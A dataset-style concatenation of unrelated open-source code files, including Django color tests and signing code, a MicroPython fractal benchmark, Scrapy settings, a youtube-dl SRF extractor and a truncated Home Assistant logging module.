dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'bg':'blue', 'opts': ('blink',)}))
self.assertEqual(parse_color_setting('error=green/blue,bold,blink'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'bg':'blue', 'opts': ('blink','bold')}))
def test_override_palette(self):
self.assertEqual(parse_color_setting('light;error=green'),
dict(PALETTES[LIGHT_PALETTE],
ERROR={'fg':'green'}))
def test_override_nocolor(self):
self.assertEqual(parse_color_setting('nocolor;error=green'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg': 'green'}))
def test_reverse_override(self):
self.assertEqual(parse_color_setting('error=green;light'), PALETTES[LIGHT_PALETTE])
def test_multiple_roles(self):
self.assertEqual(parse_color_setting('error=green;sql_field=blue'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green'},
SQL_FIELD={'fg':'blue'}))
def test_override_with_multiple_roles(self):
self.assertEqual(parse_color_setting('light;error=green;sql_field=blue'),
dict(PALETTES[LIGHT_PALETTE],
ERROR={'fg':'green'},
SQL_FIELD={'fg':'blue'}))
def test_empty_definition(self):
self.assertEqual(parse_color_setting(';'), None)
self.assertEqual(parse_color_setting('light;'), PALETTES[LIGHT_PALETTE])
self.assertEqual(parse_color_setting(';;;'), None)
def test_empty_options(self):
self.assertEqual(parse_color_setting('error=green,'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green'}))
self.assertEqual(parse_color_setting('error=green,,,'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green'}))
self.assertEqual(parse_color_setting('error=green,,blink,,'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'opts': ('blink',)}))
def test_bad_palette(self):
self.assertEqual(parse_color_setting('unknown'), None)
def test_bad_role(self):
self.assertEqual(parse_color_setting('unknown='), None)
self.assertEqual(parse_color_setting('unknown=green'), None)
self.assertEqual(parse_color_setting('unknown=green;sql_field=blue'),
dict(PALETTES[NOCOLOR_PALETTE],
SQL_FIELD={'fg':'blue'}))
def test_bad_color(self):
self.assertEqual(parse_color_setting('error='), None)
self.assertEqual(parse_color_setting('error=;sql_field=blue'),
dict(PALETTES[NOCOLOR_PALETTE],
SQL_FIELD={'fg':'blue'}))
self.assertEqual(parse_color_setting('error=unknown'), None)
self.assertEqual(parse_color_setting('error=unknown;sql_field=blue'),
dict(PALETTES[NOCOLOR_PALETTE],
SQL_FIELD={'fg':'blue'}))
self.assertEqual(parse_color_setting('error=green/unknown'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green'}))
self.assertEqual(parse_color_setting('error=green/blue/something'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'bg': 'blue'}))
self.assertEqual(parse_color_setting('error=green/blue/something,blink'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'bg': 'blue', 'opts': ('blink',)}))
def test_bad_option(self):
self.assertEqual(parse_color_setting('error=green,unknown'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green'}))
self.assertEqual(parse_color_setting('error=green,unknown,blink'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'opts': ('blink',)}))
def test_role_case(self):
self.assertEqual(parse_color_setting('ERROR=green'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green'}))
self.assertEqual(parse_color_setting('eRrOr=green'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green'}))
def test_color_case(self):
self.assertEqual(parse_color_setting('error=GREEN'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green'}))
self.assertEqual(parse_color_setting('error=GREEN/BLUE'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'bg':'blue'}))
self.assertEqual(parse_color_setting('error=gReEn'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green'}))
self.assertEqual(parse_color_setting('error=gReEn/bLuE'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'bg':'blue'}))
def test_opts_case(self):
self.assertEqual(parse_color_setting('error=green,BLINK'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'opts': ('blink',)}))
self.assertEqual(parse_color_setting('error=green,bLiNk'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'opts': ('blink',)}))
def test_colorize_empty_text(self):
self.assertEqual(colorize(text=None), '\x1b[m\x1b[0m')
self.assertEqual(colorize(text=''), '\x1b[m\x1b[0m')
self.assertEqual(colorize(text=None, opts=('noreset')), '\x1b[m')
self.assertEqual(colorize(text='', opts=('noreset')), '\x1b[m')
|
apache-2.0
|
abiggerhammer/hammer
|
src/bindings/python/setup.py
|
7
|
1281
|
#!/usr/bin/env python
"""
setup.py for Hammer bindings
"""
import os, os.path, sys
from distutils.core import setup, Extension
invoked = os.getcwd()
if (os.path.dirname(sys.argv[0]) != ''):
os.chdir(os.path.dirname(sys.argv[0]))
setup(name="hammer",
version="0.9.0",
author="Upstanding Hackers, LLC",
author_email="[email protected]",
url="https://github.com/UpstandingHackers/hammer",
description="""The Hammer parser combinator library""",
ext_modules=[Extension('_hammer', ['hammer.i'],
swig_opts=['-DHAMMER_INTERNAL__NO_STDARG_H',
'-I../../'],
define_macros=[('SWIG', None)],
depends=['allocator.h',
'glue.h',
'hammer.h',
'internal.h',],
extra_compile_args=['-fPIC',
'-std=gnu99',],
include_dirs=['../../'],
library_dirs=['../../'],
libraries=['hammer'],)],
py_modules=['hammer'],
)
os.chdir(invoked)
|
gpl-2.0
|
micropython/micropython
|
tests/perf_bench/bm_chaos.py
|
15
|
9247
|
# Source: https://github.com/python/pyperformance
# License: MIT
# create chaosgame-like fractals
# Copyright (C) 2005 Carl Friedrich Bolz
import math
import random
class GVector(object):
def __init__(self, x=0, y=0, z=0):
self.x = x
self.y = y
self.z = z
def Mag(self):
return math.sqrt(self.x ** 2 + self.y ** 2 + self.z ** 2)
def dist(self, other):
return math.sqrt(
(self.x - other.x) ** 2 + (self.y - other.y) ** 2 + (self.z - other.z) ** 2
)
def __add__(self, other):
if not isinstance(other, GVector):
raise ValueError("Can't add GVector to " + str(type(other)))
v = GVector(self.x + other.x, self.y + other.y, self.z + other.z)
return v
def __sub__(self, other):
return self + other * -1
def __mul__(self, other):
v = GVector(self.x * other, self.y * other, self.z * other)
return v
__rmul__ = __mul__
def linear_combination(self, other, l1, l2=None):
if l2 is None:
l2 = 1 - l1
v = GVector(
self.x * l1 + other.x * l2, self.y * l1 + other.y * l2, self.z * l1 + other.z * l2
)
return v
def __str__(self):
return "<%f, %f, %f>" % (self.x, self.y, self.z)
def __repr__(self):
return "GVector(%f, %f, %f)" % (self.x, self.y, self.z)
class Spline(object):
"""Class for representing B-Splines and NURBS of arbitrary degree"""
def __init__(self, points, degree, knots):
"""Creates a Spline.
points is a list of GVector, degree is the degree of the Spline.
"""
if len(points) > len(knots) - degree + 1:
raise ValueError("too many control points")
elif len(points) < len(knots) - degree + 1:
raise ValueError("not enough control points")
last = knots[0]
for cur in knots[1:]:
if cur < last:
raise ValueError("knots not strictly increasing")
last = cur
self.knots = knots
self.points = points
self.degree = degree
def GetDomain(self):
"""Returns the domain of the B-Spline"""
return (self.knots[self.degree - 1], self.knots[len(self.knots) - self.degree])
def __call__(self, u):
"""Calculates a point of the B-Spline using de Boors Algorithm"""
dom = self.GetDomain()
if u < dom[0] or u > dom[1]:
raise ValueError("Function value not in domain")
if u == dom[0]:
return self.points[0]
if u == dom[1]:
return self.points[-1]
I = self.GetIndex(u)
d = [self.points[I - self.degree + 1 + ii] for ii in range(self.degree + 1)]
U = self.knots
for ik in range(1, self.degree + 1):
for ii in range(I - self.degree + ik + 1, I + 2):
ua = U[ii + self.degree - ik]
ub = U[ii - 1]
co1 = (ua - u) / (ua - ub)
co2 = (u - ub) / (ua - ub)
index = ii - I + self.degree - ik - 1
d[index] = d[index].linear_combination(d[index + 1], co1, co2)
return d[0]
def GetIndex(self, u):
dom = self.GetDomain()
for ii in range(self.degree - 1, len(self.knots) - self.degree):
if u >= self.knots[ii] and u < self.knots[ii + 1]:
I = ii
break
else:
I = dom[1] - 1
return I
def __len__(self):
return len(self.points)
def __repr__(self):
return "Spline(%r, %r, %r)" % (self.points, self.degree, self.knots)
def write_ppm(im, w, h, filename):
with open(filename, "wb") as f:
f.write(b"P6\n%i %i\n255\n" % (w, h))
for j in range(h):
for i in range(w):
val = im[j * w + i]
c = val * 255
f.write(b"%c%c%c" % (c, c, c))
class Chaosgame(object):
def __init__(self, splines, thickness, subdivs):
self.splines = splines
self.thickness = thickness
self.minx = min([p.x for spl in splines for p in spl.points])
self.miny = min([p.y for spl in splines for p in spl.points])
self.maxx = max([p.x for spl in splines for p in spl.points])
self.maxy = max([p.y for spl in splines for p in spl.points])
self.height = self.maxy - self.miny
self.width = self.maxx - self.minx
self.num_trafos = []
maxlength = thickness * self.width / self.height
for spl in splines:
length = 0
curr = spl(0)
for i in range(1, subdivs + 1):
last = curr
t = 1 / subdivs * i
curr = spl(t)
length += curr.dist(last)
self.num_trafos.append(max(1, int(length / maxlength * 1.5)))
self.num_total = sum(self.num_trafos)
def get_random_trafo(self):
r = random.randrange(int(self.num_total) + 1)
l = 0
for i in range(len(self.num_trafos)):
if r >= l and r < l + self.num_trafos[i]:
return i, random.randrange(self.num_trafos[i])
l += self.num_trafos[i]
return len(self.num_trafos) - 1, random.randrange(self.num_trafos[-1])
def transform_point(self, point, trafo=None):
x = (point.x - self.minx) / self.width
y = (point.y - self.miny) / self.height
if trafo is None:
trafo = self.get_random_trafo()
start, end = self.splines[trafo[0]].GetDomain()
length = end - start
seg_length = length / self.num_trafos[trafo[0]]
t = start + seg_length * trafo[1] + seg_length * x
basepoint = self.splines[trafo[0]](t)
if t + 1 / 50000 > end:
neighbour = self.splines[trafo[0]](t - 1 / 50000)
derivative = neighbour - basepoint
else:
neighbour = self.splines[trafo[0]](t + 1 / 50000)
derivative = basepoint - neighbour
if derivative.Mag() != 0:
basepoint.x += derivative.y / derivative.Mag() * (y - 0.5) * self.thickness
basepoint.y += -derivative.x / derivative.Mag() * (y - 0.5) * self.thickness
else:
# can happen, especially with single precision float
pass
self.truncate(basepoint)
return basepoint
def truncate(self, point):
if point.x >= self.maxx:
point.x = self.maxx
if point.y >= self.maxy:
point.y = self.maxy
if point.x < self.minx:
point.x = self.minx
if point.y < self.miny:
point.y = self.miny
def create_image_chaos(self, w, h, iterations, rng_seed):
# Always use the same sequence of random numbers
# to get reproductible benchmark
random.seed(rng_seed)
im = bytearray(w * h)
point = GVector((self.maxx + self.minx) / 2, (self.maxy + self.miny) / 2, 0)
for _ in range(iterations):
point = self.transform_point(point)
x = (point.x - self.minx) / self.width * w
y = (point.y - self.miny) / self.height * h
x = int(x)
y = int(y)
if x == w:
x -= 1
if y == h:
y -= 1
im[(h - y - 1) * w + x] = 1
return im
###########################################################################
# Benchmark interface
bm_params = {
(100, 50): (0.25, 100, 50, 50, 50, 1234),
(1000, 1000): (0.25, 200, 400, 400, 1000, 1234),
(5000, 1000): (0.25, 400, 500, 500, 7000, 1234),
}
def bm_setup(params):
splines = [
Spline(
[
GVector(1.597, 3.304, 0.0),
GVector(1.576, 4.123, 0.0),
GVector(1.313, 5.288, 0.0),
GVector(1.619, 5.330, 0.0),
GVector(2.890, 5.503, 0.0),
GVector(2.373, 4.382, 0.0),
GVector(1.662, 4.360, 0.0),
],
3,
[0, 0, 0, 1, 1, 1, 2, 2, 2],
),
Spline(
[
GVector(2.805, 4.017, 0.0),
GVector(2.551, 3.525, 0.0),
GVector(1.979, 2.620, 0.0),
GVector(1.979, 2.620, 0.0),
],
3,
[0, 0, 0, 1, 1, 1],
),
Spline(
[
GVector(2.002, 4.011, 0.0),
GVector(2.335, 3.313, 0.0),
GVector(2.367, 3.233, 0.0),
GVector(2.367, 3.233, 0.0),
],
3,
[0, 0, 0, 1, 1, 1],
),
]
chaos = Chaosgame(splines, params[0], params[1])
image = None
def run():
nonlocal image
_, _, width, height, iter, rng_seed = params
image = chaos.create_image_chaos(width, height, iter, rng_seed)
def result():
norm = params[4]
# Images are not the same when floating point behaviour is different,
# so return percentage of pixels that are set (rounded to int).
# write_ppm(image, params[2], params[3], 'out-.ppm')
pix = int(100 * sum(image) / len(image))
return norm, pix
return run, result
|
mit
|
sestrella/ansible
|
lib/ansible/modules/windows/win_webpicmd.py
|
52
|
1398
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2015, Peter Mounce <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# this is a windows documentation stub. actual code lives in the .ps1
# file of the same name
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: win_webpicmd
version_added: "2.0"
short_description: Installs packages using Web Platform Installer command-line
description:
- Installs packages using Web Platform Installer command-line
(U(http://www.iis.net/learn/install/web-platform-installer/web-platform-installer-v4-command-line-webpicmdexe-rtw-release)).
- Must be installed and present in PATH (see M(win_chocolatey) module; 'webpicmd' is the package name, and you must install 'lessmsi' first too)?
- Install IIS first (see M(win_feature) module).
notes:
- Accepts EULAs and suppresses reboot - you will need to check manage reboots yourself (see M(win_reboot) module)
options:
name:
description:
- Name of the package to be installed.
type: str
required: yes
seealso:
- module: win_package
author:
- Peter Mounce (@petemounce)
'''
EXAMPLES = r'''
- name: Install URLRewrite2.
win_webpicmd:
name: URLRewrite2
'''
|
gpl-3.0
|
joseluisfdezbueno/proyecto_py
|
spyder_osl/spyder_osl/settings.py
|
2
|
3020
|
# -*- coding: utf-8 -*-
# Scrapy settings for spyder_osl project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'spyder_osl'
SPIDER_MODULES = ['spyder_osl.spiders']
NEWSPIDER_MODULE = 'spyder_osl.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'spyder_osl (+http://www.yourdomain.com)'
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS=32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY=3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN=16
#CONCURRENT_REQUESTS_PER_IP=16
# Disable cookies (enabled by default)
#COOKIES_ENABLED=False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED=False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'spyder_osl.middlewares.MyCustomSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'spyder_osl.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'spyder_osl.pipelines.SomePipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
# NOTE: AutoThrottle will honour the standard settings for concurrency and delay
#AUTOTHROTTLE_ENABLED=True
# The initial download delay
#AUTOTHROTTLE_START_DELAY=5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY=60
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG=False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED=True
#HTTPCACHE_EXPIRATION_SECS=0
#HTTPCACHE_DIR='httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES=[]
#HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'
|
gpl-2.0
|
cxmo/project-beta
|
code/dataprep_script.py
|
4
|
1758
|
""" The following script will apply a 3mm Gaussian filter on all the data spatially
and will save each smoothed run into the data folder as 'smoothed_run_i', where
0 <= i <= 7 is the index of the run.
"""
#Import libraries
import numpy as np
import scipy
import scipy.ndimage
from scipy.ndimage.filters import gaussian_filter
import nibabel as nb
import matplotlib.pyplot as plt
import utils.data_loading as dl
#All file strings corresponding to BOLD data for subject 4
files = ['../data/task001_run001.bold_dico.nii.gz', '../data/task001_run002.bold_dico.nii.gz',
'../data/task001_run003.bold_dico.nii.gz', '../data/task001_run004.bold_dico.nii.gz',
'../data/task001_run005.bold_dico.nii.gz', '../data/task001_run006.bold_dico.nii.gz',
'../data/task001_run007.bold_dico.nii.gz', '../data/task001_run008.bold_dico.nii.gz']
all_data = []
for index, filename in enumerate(files):
new_data = dl.load_data(filename) #load_data function drops first 4 for us
num_vols = new_data.shape[-1]
if index != 0 and index != 7:
new_num_vols = num_vols - 4
new_data = new_data[:,:,:,:new_num_vols] #Drop last 4 volumes for middle runs
all_data.append(new_data)
#Create an array of all smoothed data
for index, run in enumerate(all_data):
num_vols = np.shape(run)[-1]
run_i_smoothed = []
for time in range(num_vols):
smoothed = dl.smooth_gauss(run, 3, time)
smoothed.shape = (132, 175, 48, 1)
run_i_smoothed.append(smoothed)
run_i_smoothed = np.concatenate(run_i_smoothed, axis = 3)
np.save('../data/smoothed_run_' + str(index), run_i_smoothed) #save in data folder
print('finished run' + str(index))
run_i_smoothed = None #Save memory space
|
bsd-3-clause
|
utarsuno/urbtek
|
code_manager/miscellaneous_scripts/formatting.py
|
1
|
2795
|
# coding=utf-8
"""
This module, formatting.py, is just utility functions to format source code text.
"""
# This is needed for the custom compiler.
KEYWORDS = []
def sort_by_deliminator(deliminator, code_text, lines_to_ignore=None):
"""This method will take a chunk of code and format it so that it is sorted by column alignment as well.
:param deliminator: The character that will be used as the center piece.
:param code_text: The chunk of code to format.
:param lines_to_ignore: Any lines that should not be formatted or considered for the formatting standards.
:return: The code text returned back formatted, as a String.
"""
if code_text is '':
return ''
code_text_as_lines = code_text.split('\n')
temp_list = []
if lines_to_ignore is not None:
current_line = 0
while current_line < len(code_text_as_lines):
if current_line not in lines_to_ignore:
temp_list.append(code_text_as_lines[current_line])
current_line += 1
code_text_as_lines = temp_list
if code_text_as_lines[len(code_text_as_lines) - 1] == '':
code_text_as_lines = code_text_as_lines[0:len(code_text_as_lines) - 1]
longest_deliminator_position = -1
for line in code_text_as_lines:
if line.find(deliminator) > longest_deliminator_position:
longest_deliminator_position = line.find(deliminator)
text = ''
for line in code_text_as_lines:
first_half = line[0:line.find(deliminator)]
if line.find(deliminator) < longest_deliminator_position:
counter = 0
while counter < longest_deliminator_position - line.find(deliminator):
first_half += ' '
counter += 1
second_half = line[line.find(deliminator):len(line)]
text += first_half + second_half + '\n'
if lines_to_ignore is not None:
current_line = 0
current_line_index_from_formatted_text = 0
final_text = ''
split_text = text.split('\n')
if split_text[len(split_text) - 1] == '':
split_text = split_text[0:len(split_text) - 1]
while current_line < len(split_text) + len(lines_to_ignore):
if current_line not in lines_to_ignore:
final_text += text.split('\n')[current_line_index_from_formatted_text] + '\n'
current_line_index_from_formatted_text += 1
else:
final_text += code_text.split('\n')[current_line] + '\n'
current_line += 1
text = final_text
return text
def sort_by_two_deliminators(d0, d1, tts):
"""Just a utility function that calls the single deliminator method twice.
:param d0: first_deliminator_string {sorted for this first}
:param d1: second_deliminator_string {sorted for this second}
:param tts: The text to base the new transformed text off of.
:return: A string representing the text passed in to have two deliminators applied to them.
"""
local_text = tts
local_text = sort_by_deliminator(d0, local_text)
return sort_by_deliminator(d1, local_text)
|
apache-2.0
|
egoid/baytree
|
lib/python2.7/site-packages/django/core/signing.py
|
115
|
7060
|
"""
Functions for creating and restoring url-safe signed JSON objects.
The format used looks like this:
>>> signing.dumps("hello")
'ImhlbGxvIg:1QaUZC:YIye-ze3TTx7gtSv422nZA4sgmk'
There are two components here, separated by a ':'. The first component is a
URLsafe base64 encoded JSON of the object passed to dumps(). The second
component is a base64 encoded hmac/SHA1 hash of "$first_component:$secret"
signing.loads(s) checks the signature and returns the deserialized object.
If the signature fails, a BadSignature exception is raised.
>>> signing.loads("ImhlbGxvIg:1QaUZC:YIye-ze3TTx7gtSv422nZA4sgmk")
u'hello'
>>> signing.loads("ImhlbGxvIg:1QaUZC:YIye-ze3TTx7gtSv422nZA4sgmk-modified")
...
BadSignature: Signature failed: ImhlbGxvIg:1QaUZC:YIye-ze3TTx7gtSv422nZA4sgmk-modified
You can optionally compress the JSON prior to base64 encoding it to save
space, using the compress=True argument. This checks if compression actually
helps and only applies compression if the result is a shorter string:
>>> signing.dumps(range(1, 20), compress=True)
'.eJwFwcERACAIwLCF-rCiILN47r-GyZVJsNgkxaFxoDgxcOHGxMKD_T7vhAml:1QaUaL:BA0thEZrp4FQVXIXuOvYJtLJSrQ'
The fact that the string is compressed is signalled by the prefixed '.' at the
start of the base64 JSON.
There are 65 url-safe characters: the 64 used by url-safe base64 and the ':'.
These functions make use of all of them.
"""
from __future__ import unicode_literals
import base64
import datetime
import json
import re
import time
import zlib
from django.conf import settings
from django.utils import baseconv
from django.utils.crypto import constant_time_compare, salted_hmac
from django.utils.encoding import force_bytes, force_str, force_text
from django.utils.module_loading import import_string
_SEP_UNSAFE = re.compile(r'^[A-z0-9-_=]*$')
class BadSignature(Exception):
"""
Signature does not match
"""
pass
class SignatureExpired(BadSignature):
"""
Signature timestamp is older than required max_age
"""
pass
def b64_encode(s):
return base64.urlsafe_b64encode(s).strip(b'=')
def b64_decode(s):
pad = b'=' * (-len(s) % 4)
return base64.urlsafe_b64decode(s + pad)
def base64_hmac(salt, value, key):
return b64_encode(salted_hmac(salt, value, key).digest())
def get_cookie_signer(salt='django.core.signing.get_cookie_signer'):
Signer = import_string(settings.SIGNING_BACKEND)
key = force_bytes(settings.SECRET_KEY)
return Signer(b'django.http.cookies' + key, salt=salt)
class JSONSerializer(object):
"""
Simple wrapper around json to be used in signing.dumps and
signing.loads.
"""
def dumps(self, obj):
return json.dumps(obj, separators=(',', ':')).encode('latin-1')
def loads(self, data):
return json.loads(data.decode('latin-1'))
def dumps(obj, key=None, salt='django.core.signing', serializer=JSONSerializer, compress=False):
"""
Returns URL-safe, sha1 signed base64 compressed JSON string. If key is
None, settings.SECRET_KEY is used instead.
If compress is True (not the default) checks if compressing using zlib can
save some space. Prepends a '.' to signify compression. This is included
in the signature, to protect against zip bombs.
Salt can be used to namespace the hash, so that a signed string is
only valid for a given namespace. Leaving this at the default
value or re-using a salt value across different parts of your
application without good cause is a security risk.
The serializer is expected to return a bytestring.
"""
data = serializer().dumps(obj)
# Flag for if it's been compressed or not
is_compressed = False
if compress:
# Avoid zlib dependency unless compress is being used
compressed = zlib.compress(data)
if len(compressed) < (len(data) - 1):
data = compressed
is_compressed = True
base64d = b64_encode(data)
if is_compressed:
base64d = b'.' + base64d
return TimestampSigner(key, salt=salt).sign(base64d)
def loads(s, key=None, salt='django.core.signing', serializer=JSONSerializer, max_age=None):
"""
Reverse of dumps(), raises BadSignature if signature fails.
The serializer is expected to accept a bytestring.
"""
# TimestampSigner.unsign always returns unicode but base64 and zlib
# compression operate on bytes.
base64d = force_bytes(TimestampSigner(key, salt=salt).unsign(s, max_age=max_age))
decompress = False
if base64d[:1] == b'.':
# It's compressed; uncompress it first
base64d = base64d[1:]
decompress = True
data = b64_decode(base64d)
if decompress:
data = zlib.decompress(data)
return serializer().loads(data)
class Signer(object):
def __init__(self, key=None, sep=':', salt=None):
# Use of native strings in all versions of Python
self.key = key or settings.SECRET_KEY
self.sep = force_str(sep)
if _SEP_UNSAFE.match(self.sep):
raise ValueError(
'Unsafe Signer separator: %r (cannot be empty or consist of '
'only A-z0-9-_=)' % sep,
)
self.salt = force_str(salt or '%s.%s' % (self.__class__.__module__, self.__class__.__name__))
def signature(self, value):
signature = base64_hmac(self.salt + 'signer', value, self.key)
# Convert the signature from bytes to str only on Python 3
return force_str(signature)
def sign(self, value):
value = force_str(value)
return str('%s%s%s') % (value, self.sep, self.signature(value))
def unsign(self, signed_value):
signed_value = force_str(signed_value)
if self.sep not in signed_value:
raise BadSignature('No "%s" found in value' % self.sep)
value, sig = signed_value.rsplit(self.sep, 1)
if constant_time_compare(sig, self.signature(value)):
return force_text(value)
raise BadSignature('Signature "%s" does not match' % sig)
class TimestampSigner(Signer):
def timestamp(self):
return baseconv.base62.encode(int(time.time()))
def sign(self, value):
value = force_str(value)
value = str('%s%s%s') % (value, self.sep, self.timestamp())
return super(TimestampSigner, self).sign(value)
def unsign(self, value, max_age=None):
"""
Retrieve original value and check it wasn't signed more
than max_age seconds ago.
"""
result = super(TimestampSigner, self).unsign(value)
value, timestamp = result.rsplit(self.sep, 1)
timestamp = baseconv.base62.decode(timestamp)
if max_age is not None:
if isinstance(max_age, datetime.timedelta):
max_age = max_age.total_seconds()
# Check timestamp is not older than max_age
age = time.time() - timestamp
if age > max_age:
raise SignatureExpired(
'Signature age %s > %s seconds' % (age, max_age))
return value
|
mit
|
Buggaarde/youtube-dl
|
youtube_dl/extractor/srf.py
|
102
|
4254
|
# coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
determine_ext,
parse_iso8601,
xpath_text,
)
class SrfIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.srf\.ch/play(?:er)?/tv/[^/]+/video/(?P<display_id>[^?]+)\?id=|tp\.srgssr\.ch/p/flash\?urn=urn:srf:ais:video:)(?P<id>[0-9a-f\-]{36})'
_TESTS = [{
'url': 'http://www.srf.ch/play/tv/10vor10/video/snowden-beantragt-asyl-in-russland?id=28e1a57d-5b76-4399-8ab3-9097f071e6c5',
'md5': '4cd93523723beff51bb4bee974ee238d',
'info_dict': {
'id': '28e1a57d-5b76-4399-8ab3-9097f071e6c5',
'display_id': 'snowden-beantragt-asyl-in-russland',
'ext': 'm4v',
'upload_date': '20130701',
'title': 'Snowden beantragt Asyl in Russland',
'timestamp': 1372713995,
}
}, {
# No Speichern (Save) button
'url': 'http://www.srf.ch/play/tv/top-gear/video/jaguar-xk120-shadow-und-tornado-dampflokomotive?id=677f5829-e473-4823-ac83-a1087fe97faa',
'md5': 'd97e236e80d1d24729e5d0953d276a4f',
'info_dict': {
'id': '677f5829-e473-4823-ac83-a1087fe97faa',
'display_id': 'jaguar-xk120-shadow-und-tornado-dampflokomotive',
'ext': 'flv',
'upload_date': '20130710',
'title': 'Jaguar XK120, Shadow und Tornado-Dampflokomotive',
'timestamp': 1373493600,
},
}, {
'url': 'http://www.srf.ch/player/tv/10vor10/video/snowden-beantragt-asyl-in-russland?id=28e1a57d-5b76-4399-8ab3-9097f071e6c5',
'only_matching': True,
}, {
'url': 'https://tp.srgssr.ch/p/flash?urn=urn:srf:ais:video:28e1a57d-5b76-4399-8ab3-9097f071e6c5',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
display_id = re.match(self._VALID_URL, url).group('display_id') or video_id
video_data = self._download_xml(
'http://il.srgssr.ch/integrationlayer/1.0/ue/srf/video/play/%s.xml' % video_id,
display_id)
title = xpath_text(
video_data, './AssetMetadatas/AssetMetadata/title', fatal=True)
thumbnails = [{
'url': s.text
} for s in video_data.findall('.//ImageRepresentation/url')]
timestamp = parse_iso8601(xpath_text(video_data, './createdDate'))
# The <duration> field in XML is different from the exact duration, skipping
formats = []
for item in video_data.findall('./Playlists/Playlist') + video_data.findall('./Downloads/Download'):
for url_node in item.findall('url'):
quality = url_node.attrib['quality']
full_url = url_node.text
original_ext = determine_ext(full_url)
format_id = '%s-%s' % (quality, item.attrib['protocol'])
if original_ext == 'f4m':
formats.extend(self._extract_f4m_formats(
full_url + '?hdcore=3.4.0', display_id, f4m_id=format_id))
elif original_ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
full_url, display_id, 'mp4', m3u8_id=format_id))
else:
formats.append({
'url': full_url,
'ext': original_ext,
'format_id': format_id,
'quality': 0 if 'HD' in quality else -1,
'preference': 1,
})
self._sort_formats(formats)
subtitles = {}
subtitles_data = video_data.find('Subtitles')
if subtitles_data is not None:
subtitles_list = [{
'url': sub.text,
'ext': determine_ext(sub.text),
} for sub in subtitles_data]
if subtitles_list:
subtitles['de'] = subtitles_list
return {
'id': video_id,
'display_id': display_id,
'formats': formats,
'title': title,
'thumbnails': thumbnails,
'timestamp': timestamp,
'subtitles': subtitles,
}
|
unlicense
|
morphis/home-assistant
|
homeassistant/util/logging.py
|
14
|
3216
|
"""Logging utilities."""
import asyncio
import logging
import threading
from .async import run_coroutine_threadsafe
class HideSensitiveDataFilter(logging.Filter):
"""Filter API password calls."""
def __init__(self, text):
"""Initialize sensitive data filter."""
super().__init__()
self.text = text
def filter(self, record):
"""Hide sensitive data in messages."""
record.msg = record.msg.replace(self.text, '*******')
return True
# pylint: disable=invalid-name
class AsyncHandler(object):
"""Logging handler wrapper to add a async layer."""
def __init__(self, loop, handler):
